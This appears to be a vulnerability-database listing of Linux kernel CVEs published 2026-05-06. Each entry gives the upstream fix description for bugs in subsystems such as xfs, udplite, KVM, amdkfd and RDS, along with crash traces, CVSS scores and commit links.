| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: remove xfs_attr_leaf_hasname The calling convention of xfs_attr_leaf_hasname() is problematic, because it returns a NULL buffer when xfs_attr3_leaf_read fails, a valid buffer when xfs_attr3_leaf_lookup_int returns -ENOATTR or -EEXIST, and a non-NULL buffer pointer for an already released buffer when xfs_attr3_leaf_lookup_int fails with other error values. Fix this by simply open coding xfs_attr_leaf_hasname in the callers, so that the buffer release code is done by each caller of xfs_attr3_leaf_read. | 2026-05-06 | 7.8 | CVE-2026-43153 | https://git.kernel.org/stable/c/2fbc8421d1db102c0e5458607e042a23a03648b1 https://git.kernel.org/stable/c/457121c01f609b9934addbb04d5c1ef638c71c61 https://git.kernel.org/stable/c/530082df991903f3330354e99e0cb7b05debfa86 https://git.kernel.org/stable/c/3a65ea768b8094e4699e72f9ab420eb9e0f3f568 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udplite: Fix null-ptr-deref in __udp_enqueue_schedule_skb(). syzbot reported null-ptr-deref of udp_sk(sk)->udp_prod_queue. [0] Since the cited commit, udp_lib_init_sock() can fail, as can udp_init_sock() and udpv6_init_sock(). Let's handle the error in udplite_sk_init() and udplitev6_sk_init(). [0]: BUG: KASAN: null-ptr-deref in instrument_atomic_read include/linux/instrumented.h:82 [inline] BUG: KASAN: null-ptr-deref in atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline] BUG: KASAN: null-ptr-deref in __udp_enqueue_schedule_skb+0x151/0x1480 net/ipv4/udp.c:1719 Read of size 4 at addr 0000000000000008 by task syz.2.18/2944 CPU: 1 UID: 0 PID: 2944 Comm: syz.2.18 Not tainted syzkaller #0 PREEMPTLAZY Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Call Trace: <IRQ> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 kasan_report+0xa2/0xe0 mm/kasan/report.c:595 check_region_inline mm/kasan/generic.c:-1 [inline] kasan_check_range+0x264/0x2c0 mm/kasan/generic.c:200 instrument_atomic_read include/linux/instrumented.h:82 [inline] atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline] __udp_enqueue_schedule_skb+0x151/0x1480 net/ipv4/udp.c:1719 __udpv6_queue_rcv_skb net/ipv6/udp.c:795 [inline] udpv6_queue_rcv_one_skb+0xa2e/0x1ad0 net/ipv6/udp.c:906 udp6_unicast_rcv_skb+0x227/0x380 net/ipv6/udp.c:1064 ip6_protocol_deliver_rcu+0xe17/0x1540 net/ipv6/ip6_input.c:438 ip6_input_finish+0x191/0x350 net/ipv6/ip6_input.c:489 NF_HOOK+0x354/0x3f0 include/linux/netfilter.h:318 ip6_input+0x16c/0x2b0 net/ipv6/ip6_input.c:500 NF_HOOK+0x354/0x3f0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6149 [inline] __netif_receive_skb+0xd3/0x370 net/core/dev.c:6262 process_backlog+0x4d6/0x1160 net/core/dev.c:6614 __napi_poll+0xae/0x320 net/core/dev.c:7678 napi_poll net/core/dev.c:7741 [inline] net_rx_action+0x60d/0xdc0 net/core/dev.c:7893 handle_softirqs+0x209/0x8d0 kernel/softirq.c:622 do_softirq+0x52/0x90 kernel/softirq.c:523 </IRQ> <TASK> __local_bh_enable_ip+0xe7/0x120 kernel/softirq.c:450 local_bh_enable include/linux/bottom_half.h:33 [inline] rcu_read_unlock_bh include/linux/rcupdate.h:924 [inline] __dev_queue_xmit+0x109c/0x2dc0 net/core/dev.c:4856 __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline] ip6_finish_output+0x158/0x4e0 net/ipv6/ip6_output.c:219 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x342/0x580 net/ipv6/ip6_output.c:246 ip6_send_skb+0x1d7/0x3c0 net/ipv6/ip6_output.c:1984 udp_v6_send_skb+0x9a5/0x1770 net/ipv6/udp.c:1442 udp_v6_push_pending_frames+0xa2/0x140 net/ipv6/udp.c:1469 udpv6_sendmsg+0xfe0/0x2830 net/ipv6/udp.c:1759 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xe5/0x270 net/socket.c:742 __sys_sendto+0x3eb/0x580 net/socket.c:2206 __do_sys_sendto net/socket.c:2213 [inline] __se_sys_sendto net/socket.c:2209 [inline] __x64_sys_sendto+0xde/0x100 net/socket.c:2209 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd2/0xf20 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f67b4d9c629 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f67b5c98028 EFLAGS: 00000246 ORIG_RAX: 000000000000002c RAX: ffffffffffffffda RBX: 00007f67b5015fa0 RCX: 00007f67b4d9c629 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007f67b4e32b39 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000040000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f67b5016038 R14: 00007f67b5015fa0 R15: 00007ffe3cb66dd8 </TASK> | 2026-05-06 | 7.5 | CVE-2026-43164 | https://git.kernel.org/stable/c/f27030ac5bef47d997cfac05a3d188aa69f4df7f https://git.kernel.org/stable/c/0f13fa087ead642ea1eb5fdb6eb092c913ef06b7 https://git.kernel.org/stable/c/470c7ca2b4c3e3a51feeb952b7f97a775b5c49cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix interlaced plain identification for encoded extents Only plain data whose start position and on-disk physical length are both aligned to the block size should be classified as interlaced plain extents. Otherwise, it must be treated as shifted plain extents. This issue was found by syzbot using a crafted compressed image containing plain extents with unaligned physical lengths, which can cause OOB read in z_erofs_transform_plain(). | 2026-05-06 | 7.1 | CVE-2026-43166 | https://git.kernel.org/stable/c/9d5a97bc71ed5783687705c708454c4453aa91d1 https://git.kernel.org/stable/c/d3790f26d38606f020212486359b84632c19d08b https://git.kernel.org/stable/c/4a2d046e4b13202a6301a993961f5b30ae4d7119 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: procfs: fix possible double mmput() in do_procmap_query() When user provides incorrectly sized buffer for build ID for PROCMAP_QUERY we return with -ENAMETOOLONG error. After recent changes this condition happens later, after we unlocked mmap_lock/per-VMA lock and did mmput(), so original goto out is now wrong and will double-mmput() mm_struct. Fix by jumping further to clean up only vm_file and name_buf. | 2026-05-06 | 7.8 | CVE-2026-43178 | https://git.kernel.org/stable/c/f9fe092084cd04deea18747f58a2304026e76aaa https://git.kernel.org/stable/c/8adaff87db143583e08eec4f4e7788f1ef8af94d https://git.kernel.org/stable/c/90f5e87c9b75833b9ef3a4415b92c0247f28ab2f https://git.kernel.org/stable/c/61dc9f776705d6db6847c101b98fa4f0e9eb6fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: kaweth: remove TX queue manipulation in kaweth_set_rx_mode kaweth_set_rx_mode(), the ndo_set_rx_mode callback, calls netif_stop_queue() and netif_wake_queue(). These are TX queue flow control functions unrelated to RX multicast configuration. The premature netif_wake_queue() can re-enable TX while tx_urb is still in-flight, leading to a double usb_submit_urb() on the same URB: kaweth_start_xmit() { netif_stop_queue(); usb_submit_urb(kaweth->tx_urb); } kaweth_set_rx_mode() { netif_stop_queue(); netif_wake_queue(); // wakes TX queue before URB is done } kaweth_start_xmit() { netif_stop_queue(); usb_submit_urb(kaweth->tx_urb); // URB submitted while active } This triggers the WARN in usb_submit_urb(): "URB submitted while active" This is the same class of bug that was fixed in rtl8150 by commit 958baf5eaee3 ("net: usb: Remove disruptive netif_wake_queue in rtl8150_set_multicast"). Also, kaweth_set_rx_mode() is already functionally broken: the real set_rx_mode action is performed by kaweth_async_set_rx_mode(), which in turn is a no-op except at ndo_open() time. | 2026-05-06 | 7.8 | CVE-2026-43180 | https://git.kernel.org/stable/c/443a830b1dc4f85c7560da59d4494b629feee215 https://git.kernel.org/stable/c/586318c2730433184c6f1d21183e346ddf25e81d https://git.kernel.org/stable/c/a2cd4b4db315a845a5603d08c9d03b11ddfc799d https://git.kernel.org/stable/c/ef9b10a020503888eb6c8ed85a3d901a624ede4c https://git.kernel.org/stable/c/9c79b839a63980c7da7ec5db895198045e154112 https://git.kernel.org/stable/c/fc393af769af845d9985e2845e49553d8f015a64 https://git.kernel.org/stable/c/8367c0e90126426e60581e4c07e1ec4411a0f843 https://git.kernel.org/stable/c/64868f5ecadeb359a49bc4485bfa7c497047f13a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rnbd-srv: Zero the rsp buffer before using it Before using the data buffer to send back the response message, zero it completely. This prevents any stray bytes from being picked up by the client side when the message is exchanged between different protocol versions. | 2026-05-06 | 7.5 | CVE-2026-43184 | https://git.kernel.org/stable/c/e4272754063d52c9ad0169865add8816ba696471 https://git.kernel.org/stable/c/e2cacec7d4291300a282feb3af8eba57b93b15aa https://git.kernel.org/stable/c/b646e54d23b9b592d612a2036aab14e0f6c14206 https://git.kernel.org/stable/c/30868a6a5238849d554295aff3ce61d242d7fad8 https://git.kernel.org/stable/c/7aac0a30dcf41cdb510526740d9a2ab1520c5d98 https://git.kernel.org/stable/c/c94ede3c436dfbd9cedd9cb69f604f6fc901b6a2 https://git.kernel.org/stable/c/852475278ca5e96e0c0275950e1a84203e602b33 https://git.kernel.org/stable/c/69d26698e4fd44935510553809007151b2fe4db5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: consume xmit errors of GSO frames udpgro_frglist.sh and udpgro_bench.sh are the flakiest tests currently in NIPA. They fail in the same exact way, TCP GRO test stalls occasionally and the test gets killed after 10min. These tests use veth to simulate GRO. They attach a trivial ("return XDP_PASS;") XDP program to the veth to force TSO off and NAPI on. Digging into the failure mode we can see that the connection is completely stuck after a burst of drops. The sender's snd_nxt is at sequence number N [1], but the receiver claims to have received (rcv_nxt) up to N + 3 * MSS [2]. Last piece of the puzzle is that senders rtx queue is not empty (let's say the block in the rtx queue is at sequence number N - 4 * MSS [3]). In this state, sender sends a retransmission from the rtx queue with a single segment, and sequence numbers N-4*MSS:N-3*MSS [3]. Receiver sees it and responds with an ACK all the way up to N + 3 * MSS [2]. But sender will reject this ack as TCP_ACK_UNSENT_DATA because it has no recollection of ever sending data that far out [1]. And we are stuck. The root cause is the mess of the xmit return codes. veth returns an error when it can't xmit a frame. We end up with a loss event like this: ------------------------------------------------- | GSO super frame 1 | GSO super frame 2 | |-----------------------------------------------| | seg | seg | seg | seg | seg | seg | seg | seg | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | ------------------------------------------------- x ok ok <ok>| ok ok ok <x> \\ snd_nxt "x" means packet lost by veth, and "ok" means it went thru. Since veth has TSO disabled in this test it sees individual segments. Segment 1 is on the retransmit queue and will be resent. So why did the sender not advance snd_nxt even though it clearly did send up to seg 8? tcp_write_xmit() interprets the return code from the core to mean that data has not been sent at all. Since TCP deals with GSO super frames, not individual segments, the crux of the problem is that loss of a single segment can be interpreted as loss of all. TCP only sees the last return code for the last segment of the GSO frame (in <> brackets in the diagram above). Of course for the problem to occur we need a setup or a device without a Qdisc. Otherwise the Qdisc layer disconnects the protocol layer from the device errors completely. We have multiple ways to fix this. 1) make veth not return an error when it lost a packet. While this is what I think we did in the past, the issue keeps reappearing and it's annoying to debug. The game of whack-a-mole is not great. 2) fix the damn return codes We only talk about NETDEV_TX_OK and NETDEV_TX_BUSY in the documentation, so maybe we should make the return code from ndo_start_xmit() a boolean. I like that the most, but perhaps some ancient, not-really-networking protocol would suffer. 3) make TCP ignore the errors It is not entirely clear to me what benefit TCP gets from interpreting the result of ip_queue_xmit()? Specifically once the connection is established and we're pushing data - packet loss is just packet loss? 4) this fix Ignore the rc in the Qdisc-less+GSO case, since it's unreliable. We already always return OK in the TCQ_F_CAN_BYPASS case. In the Qdisc-less case let's be a bit more conservative and only mask the GSO errors. This path is taken by non-IP-"networks" like CAN, MCTP etc, so we could regress some ancient thing. This is the simplest, but also maybe the hackiest fix? A similar fix was proposed by Eric in the past but never committed because the original reporter was working with an OOT driver and wasn't providing feedback (see Link). | 2026-05-06 | 7.5 | CVE-2026-43194 | https://git.kernel.org/stable/c/ae3f627b45fbc3c776a4e484696f3cad7cbb4eca https://git.kernel.org/stable/c/0c9de092ef8c50a7ee9612811566f0aa81d8d7b6 https://git.kernel.org/stable/c/56bd32c0edca34041a5c215887fcf562fae2e2db https://git.kernel.org/stable/c/9ac6aebef4b4bfc5ed408b0b65645981574bc780 https://git.kernel.org/stable/c/ea5d7787635e26ec1194ec7eec0e8e5ae3bd10a5 https://git.kernel.org/stable/c/4cb163e9efcac4cd35c3043e097f25081a5c015c https://git.kernel.org/stable/c/c86901d22c89a6bf4e2f013e948aaabc60869893 https://git.kernel.org/stable/c/7aa767d0d3d04e50ae94e770db7db8197f666970 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address query Fix a "scheduling while atomic" bug in mlx5e_ipsec_init_macs() by replacing mlx5_query_mac_address() with ether_addr_copy() to get the local MAC address directly from netdev->dev_addr. The issue occurs because mlx5_query_mac_address() queries the hardware which involves mlx5_cmd_exec() that can sleep, but it is called from the mlx5e_ipsec_handle_event workqueue which runs in atomic context. The MAC address is already available in netdev->dev_addr, so no need to query hardware. This avoids the sleeping call and resolves the bug. Call trace: BUG: scheduling while atomic: kworker/u112:2/69344/0x00000200 __schedule+0x7ab/0xa20 schedule+0x1c/0xb0 schedule_timeout+0x6e/0xf0 __wait_for_common+0x91/0x1b0 cmd_exec+0xa85/0xff0 [mlx5_core] mlx5_cmd_exec+0x1f/0x50 [mlx5_core] mlx5_query_nic_vport_mac_address+0x7b/0xd0 [mlx5_core] mlx5_query_mac_address+0x19/0x30 [mlx5_core] mlx5e_ipsec_init_macs+0xc1/0x720 [mlx5_core] mlx5e_ipsec_build_accel_xfrm_attrs+0x422/0x670 [mlx5_core] mlx5e_ipsec_handle_event+0x2b9/0x460 [mlx5_core] process_one_work+0x178/0x2e0 worker_thread+0x2ea/0x430 | 2026-05-06 | 7.5 | CVE-2026-43199 | https://git.kernel.org/stable/c/e1407fb7c337373dfaaae2445d828b0b9ae26a29 https://git.kernel.org/stable/c/57957bc7f1865778ec9b1618e15515feb6df7eb4 https://git.kernel.org/stable/c/546de94e41e92e1f7dc6213615fb7c794d05db98 https://git.kernel.org/stable/c/859380694f434597407632c29f30fdb5e763e6cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: atm: fore200e: fix use-after-free in tasklets during device removal When the PCA-200E or SBA-200E adapter is being detached, the fore200e is deallocated. However, the tx_tasklet or rx_tasklet may still be running or pending, leading to a use-after-free bug when the already freed fore200e is accessed again in fore200e_tx_tasklet() or fore200e_rx_tasklet(). One of the race conditions can occur as follows: CPU 0 (cleanup) | CPU 1 (tasklet) fore200e_pca_remove_one() | fore200e_interrupt() fore200e_shutdown() | tasklet_schedule() kfree(fore200e) | fore200e_tx_tasklet() | fore200e-> // UAF Fix this by ensuring tx_tasklet or rx_tasklet is properly canceled before the fore200e is released. Add tasklet_kill() in fore200e_shutdown() to synchronize with any pending or running tasklets. Moreover, since fore200e_reset() could prevent further interrupts or data transfers, the tasklet_kill() should be placed after fore200e_reset() to prevent the tasklet from being rescheduled in fore200e_interrupt(). Finally, it only needs to do tasklet_kill() when the fore200e state is greater than or equal to FORE200E_STATE_IRQ, since tasklets are uninitialized in earlier states. In a word, the tasklet_kill() should be placed in the FORE200E_STATE_IRQ branch within the switch...case structure. This bug was identified through static analysis. | 2026-05-06 | 7.5 | CVE-2026-43203 | https://git.kernel.org/stable/c/91f25749aaf57c47ae1e12478144e6ea8c8562f2 https://git.kernel.org/stable/c/73fbc5d1a9ccb626937500bbd67136f077d8237b https://git.kernel.org/stable/c/aba0b4bc09376dfc3d53c826514fe38fc8337f52 https://git.kernel.org/stable/c/e075ec9b08f862dade8011481058f7eb5f716c57 https://git.kernel.org/stable/c/97900f512252a59f23d6ce4ab215cc88fed66e68 https://git.kernel.org/stable/c/e4ff4e3ffcf9d5aad380cdd1d8cdc008bb34f97d https://git.kernel.org/stable/c/5189368f10903956be05062d160b2804bf5e5016 https://git.kernel.org/stable/c/8930878101cd40063888a68af73b1b0f8b6c79bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix out-of-bounds write in kfd_event_page_set() The kfd_event_page_set() function writes KFD_SIGNAL_EVENT_LIMIT * 8 bytes via memset without checking the buffer size parameter. This allows unprivileged userspace to trigger an out-of-bounds kernel memory write by passing a small buffer, leading to potential privilege escalation. | 2026-05-06 | 7.8 | CVE-2026-43206 | https://git.kernel.org/stable/c/3e04bc310d80b46eaf481f1fefcbcb37a187412d https://git.kernel.org/stable/c/de8d7a25cd2eb5875b1d8d4fbc7fe4b4138b781f https://git.kernel.org/stable/c/b4034442cb090e4a980bdcc1540948606cbc951b https://git.kernel.org/stable/c/4857c37c7ba9aa38b9a4c694e8bd8d0091c87940 https://git.kernel.org/stable/c/75fb57efdd7863fffbc39db23e9cad7aafda26ed https://git.kernel.org/stable/c/bfcd6b53e1f4feb182952f4ff9a137c36ceaf20b https://git.kernel.org/stable/c/4e72f419e4ed44cb3b60506752d8688c20a60a9b https://git.kernel.org/stable/c/8a70a26c9f34baea6c3199a9862ddaff4554a96d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-mdp: Fix error handling in probe function Add mtk_mdp_unregister_m2m_device() on the error handling path to prevent resource leak. Add check for the return value of vpu_get_plat_device() to prevent null pointer dereference. And vpu_get_plat_device() increases the reference count of the returned platform device. Add platform_device_put() to prevent reference leak. | 2026-05-06 | 7.8 | CVE-2026-43207 | https://git.kernel.org/stable/c/9d9c67976eda502edc6b3a148a1c5b6a18b69a98 https://git.kernel.org/stable/c/0bc43eaf021347f8d5aba87712c36b799695eec6 https://git.kernel.org/stable/c/9d7962d5c81d6cf3f8dbdb5c71c57600bac5772b https://git.kernel.org/stable/c/12cafc15d24611bfb43c82877b1bbb7454a85d5a https://git.kernel.org/stable/c/c8737d33d4e8ffae87e5d5edac17f8a705235cc2 https://git.kernel.org/stable/c/b3fc99fe5b25613dd61c57bc70b8479adff4f60d https://git.kernel.org/stable/c/2e8f53a7382943411557e370f1a4f3946624a30e https://git.kernel.org/stable/c/8a8a3232abac5b972058a5f2cb3e33199d2a8648 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix pci_slot_trylock() error handling Commit a4e772898f8b ("PCI: Add missing bridge lock to pci_bus_lock()") delegates the bridge device's pci_dev_trylock() to pci_bus_trylock() in pci_slot_trylock(), but it forgets to remove the corresponding pci_dev_unlock() when pci_bus_trylock() fails. Before a4e772898f8b, the code did: if (!pci_dev_trylock(dev)) /* <- lock bridge device */ goto unlock; if (dev->subordinate) { if (!pci_bus_trylock(dev->subordinate)) { pci_dev_unlock(dev); /* <- unlock bridge device */ goto unlock; } } After a4e772898f8b the bridge-device lock is no longer taken, but the pci_dev_unlock(dev) on the failure path was left in place, leading to the bug. This yields one of two errors: 1. A warning that the lock is being unlocked when no one holds it. 2. An incorrect unlock of a lock that belongs to another thread. Fix it by removing the now-redundant pci_dev_unlock(dev) on the failure path. [Same patch later posted by Keith at https://patch.msgid.link/20260116184150.3013258-1-kbusch@meta.com] | 2026-05-06 | 7.8 | CVE-2026-43211 | https://git.kernel.org/stable/c/ebb27b7399ab8b9eb1f792b329aa5f6250c590d4 https://git.kernel.org/stable/c/fbe06a3058114bf95a17a4941b205f4b321c6f0a https://git.kernel.org/stable/c/943ed56606a7ab2fe5a99cad572dd17d484310c7 https://git.kernel.org/stable/c/a19b61fdb958ffadbba85b43c991eb9fc70c1c1c https://git.kernel.org/stable/c/0425aaf20b407d2f2cf3bf469808e4a35f9abb8b https://git.kernel.org/stable/c/bd435f4b738130d732ef64e0e57e45185f77165d https://git.kernel.org/stable/c/8b08ea9690b212b7bf7f12414039259cf34b1aa0 https://git.kernel.org/stable/c/9368d1ee62829b08aa31836b3ca003803caf0b72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Make cpumask_of_node() robust against NUMA_NO_NODE The arch definition of cpumask_of_node() cannot handle NUMA_NO_NODE - which is a valid index - so add a check for this. | 2026-05-06 | 7.8 | CVE-2026-43212 | https://git.kernel.org/stable/c/b5bf05e05cdf489a04137e4da407de9d4cca5295 https://git.kernel.org/stable/c/bb1a54f7f011f19ed936632698eae574e0b91063 https://git.kernel.org/stable/c/92adfb707beec0fe956424373654a70aad35ea13 https://git.kernel.org/stable/c/61a56df2fbaad3a4d00f0c6a904b5d1ee8982eb4 https://git.kernel.org/stable/c/1d8f2f024801019d85159a020b72a4424b46bcf4 https://git.kernel.org/stable/c/94b0c831eda778ae9e4f2164a8b3de485d8977bb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: pci: validate sequence number of TX release report Hardware rarely reports an abnormal sequence number in the TX release report, which leads to an out-of-bounds access of the wd_ring->pages array, causing a NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 1 PID: 1085 Comm: irq/129-rtw89_p Tainted: G S U 6.1.145-17510-g2f3369c91536 #1 (HASH:69e8 1) Call Trace: <IRQ> rtw89_pci_release_tx+0x18f/0x300 [rtw89_pci (HASH:4c83 2)] rtw89_pci_napi_poll+0xc2/0x190 [rtw89_pci (HASH:4c83 2)] net_rx_action+0xfc/0x460 net/core/dev.c:6578 net/core/dev.c:6645 net/core/dev.c:6759 handle_softirqs+0xbe/0x290 kernel/softirq.c:601 ? rtw89_pci_interrupt_threadfn+0xc5/0x350 [rtw89_pci (HASH:4c83 2)] __local_bh_enable_ip+0xeb/0x120 kernel/softirq.c:499 kernel/softirq.c:423 </IRQ> <TASK> rtw89_pci_interrupt_threadfn+0xf8/0x350 [rtw89_pci (HASH:4c83 2)] ? irq_thread+0xa7/0x340 kernel/irq/manage.c:0 irq_thread+0x177/0x340 kernel/irq/manage.c:1205 kernel/irq/manage.c:1314 ? thaw_kernel_threads+0xb0/0xb0 kernel/irq/manage.c:1202 ? irq_forced_thread_fn+0x80/0x80 kernel/irq/manage.c:1220 kthread+0xea/0x110 kernel/kthread.c:376 ? synchronize_irq+0x1a0/0x1a0 kernel/irq/manage.c:1287 ? kthread_associate_blkcg+0x80/0x80 kernel/kthread.c:331 ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:295 </TASK> To prevent the crash, validate rpp_info.seq before using it. | 2026-05-06 | 7.5 | CVE-2026-43213 | https://git.kernel.org/stable/c/ef7fa19809b2d892d45da53f90ac698d13c367fd https://git.kernel.org/stable/c/b342dd13aedccb0dd27365f6cc63a262f42394ce https://git.kernel.org/stable/c/957eda596c7665f2966970fd1dcc35fe299b38e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Add SRCU protection for reading PDPTRs in __get_sregs2() Add SRCU read-side protection when reading PDPTR registers in __get_sregs2(). Reading PDPTRs may trigger access to guest memory: kvm_pdptr_read() -> svm_cache_reg() -> load_pdptrs() -> kvm_vcpu_read_guest_page() -> kvm_vcpu_gfn_to_memslot() kvm_vcpu_gfn_to_memslot() dereferences memslots via __kvm_memslots(), which uses srcu_dereference_check() and requires either kvm->srcu or kvm->slots_lock to be held. Currently only vcpu->mutex is held, triggering a lockdep warning: ============================= WARNING: suspicious RCU usage in kvm_vcpu_gfn_to_memslot 6.12.59+ #3 Not tainted include/linux/kvm_host.h:1062 suspicious rcu_dereference_check() usage! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 1 lock held by syz.5.1717/15100: #0: ff1100002f4b00b0 (&vcpu->mutex){+.+.}-{3:3}, at: kvm_vcpu_ioctl+0x1d5/0x1590 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xf0/0x120 lib/dump_stack.c:120 lockdep_rcu_suspicious+0x1e3/0x270 kernel/locking/lockdep.c:6824 __kvm_memslots include/linux/kvm_host.h:1062 [inline] __kvm_memslots include/linux/kvm_host.h:1059 [inline] kvm_vcpu_memslots include/linux/kvm_host.h:1076 [inline] kvm_vcpu_gfn_to_memslot+0x518/0x5e0 virt/kvm/kvm_main.c:2617 kvm_vcpu_read_guest_page+0x27/0x50 virt/kvm/kvm_main.c:3302 load_pdptrs+0xff/0x4b0 arch/x86/kvm/x86.c:1065 svm_cache_reg+0x1c9/0x230 arch/x86/kvm/svm/svm.c:1688 kvm_pdptr_read arch/x86/kvm/kvm_cache_regs.h:141 [inline] __get_sregs2 arch/x86/kvm/x86.c:11784 [inline] kvm_arch_vcpu_ioctl+0x3e20/0x4aa0 arch/x86/kvm/x86.c:6279 kvm_vcpu_ioctl+0x856/0x1590 virt/kvm/kvm_main.c:4663 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl fs/ioctl.c:893 [inline] __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xbd/0x1d0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-06 | 7.8 | CVE-2026-43214 | https://git.kernel.org/stable/c/f621ca24f9f489e226e22560761b04884984133b https://git.kernel.org/stable/c/708e20c66b2761d878a2bc3c7534e7f814e4dec5 https://git.kernel.org/stable/c/9f2bfea51151dfbb24b52f452eb3d5f5fe0e506e https://git.kernel.org/stable/c/57536ff0a6bd69a5808d682925202babdb5ddc13 https://git.kernel.org/stable/c/b33f8d816950b10e7879cd8ffd7ae4b649ada4db https://git.kernel.org/stable/c/95d848dc7e639988dbb385a8cba9b484607cf98c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: verisilicon: AV1: Fix tile info buffer size Each tile info is composed of: row_sb, col_sb, start_pos and end_pos (4 bytes each). So the total required memory is AV1_MAX_TILES * 16 bytes. Use the correct #define to allocate the buffer and avoid writing tile info in non-allocated memory. | 2026-05-06 | 7.8 | CVE-2026-43222 | https://git.kernel.org/stable/c/a5b1ddbe31f49b4da78642157589970e9b60a231 https://git.kernel.org/stable/c/34f36f9c6114af781a5a4f7a7c99334c85b73fc7 https://git.kernel.org/stable/c/f122f2b3ce9dbde60bf7ab0b180fe4a01f9d9bc4 https://git.kernel.org/stable/c/74abfadd7ef5ac9f3a6111d550cc651d1457c641 https://git.kernel.org/stable/c/a505ca2db89ad92a8d8d27fa68ebafb12e04a679 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: No shortcut out of RDS_CONN_ERROR RDS connections carry a state "rds_conn_path::cp_state" and transitions from one state to another and are conditional upon an expected state: "rds_conn_path_transition." There is one exception to this conditionality, which is "RDS_CONN_ERROR" that can be enforced by "rds_conn_path_drop" regardless of what state the connection is currently in. But as soon as a connection enters state "RDS_CONN_ERROR", the connection handling code expects it to go through the shutdown-path. The RDS/TCP multipath changes added a shortcut out of "RDS_CONN_ERROR" straight back to "RDS_CONN_CONNECTING" via "rds_tcp_accept_one_path" (e.g. after "rds_tcp_state_change"). A subsequent "rds_tcp_reset_callbacks" can then transition the state to "RDS_CONN_RESETTING" with a shutdown-worker queued. That'll trip up "rds_conn_init_shutdown", which was never adjusted to handle "RDS_CONN_RESETTING" and subsequently drops the connection with the dreaded "DR_INV_CONN_STATE", which leaves "RDS_SHUTDOWN_WORK_QUEUED" on forever. So we do two things here: a) Don't shortcut "RDS_CONN_ERROR", but take the longer path through the shutdown code. b) Add "RDS_CONN_RESETTING" to the expected states in "rds_conn_init_shutdown" so that we won't error out and get stuck, if we ever hit weird state transitions like this again. | 2026-05-06 | 7.5 | CVE-2026-43226 | https://git.kernel.org/stable/c/9bcd7c00691a2db9745817d5ea79262a503b135c https://git.kernel.org/stable/c/a179ac7be8f5a650d0068040705f4cddd6ca369c https://git.kernel.org/stable/c/19e384a7d00d888303a8285977cdf1970c6cccd6 https://git.kernel.org/stable/c/f0f729bdffb08af32e0f54521b81b8a9e0321f16 https://git.kernel.org/stable/c/81248b1eb3c5954cc1fc7b33b7c03e34d20cb8c8 https://git.kernel.org/stable/c/899ef00963ce76f9fc421a7d02335fe4ead6389b https://git.kernel.org/stable/c/9ff599a9be784a808c36765086e3db2144aa3b66 https://git.kernel.org/stable/c/ad22d24be635c6beab6a1fdd3f8b1f3c478d15da |
